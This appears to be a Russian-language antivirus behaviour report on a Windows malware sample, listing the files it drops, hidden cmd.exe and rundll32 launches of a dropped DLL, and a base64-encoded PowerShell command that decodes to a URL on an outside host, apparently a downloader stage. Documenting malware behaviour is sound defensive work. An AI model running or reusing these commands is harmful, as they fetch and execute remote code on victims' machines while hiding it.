Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\yhjlswle.vbs
Запускает на исполнение (эксплоит)
- '%CommonProgramFiles%\microsoft shared\DW\DW20.EXE' -x -s 1412
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\error014880_01.xml
- %ALLUSERSPROFILE%\yhjlswle.vbs
- %ALLUSERSPROFILE%\ughldskbhn.bat
- %TEMP%\1435786.cvr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\ughldskbhn.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\bneuihlows.dll,hjyldksfkw3' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\ughldskbhn.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAGgAYQByAHAAZQByAGgAbwB1AHMAZQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAE0AZQByAGMAaABhAG4AdAAyAC8AQQBSAHMAZgAxAEwASQBjAE8AYQB1...
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\bneuihlows.dll,hjyldksfkw3
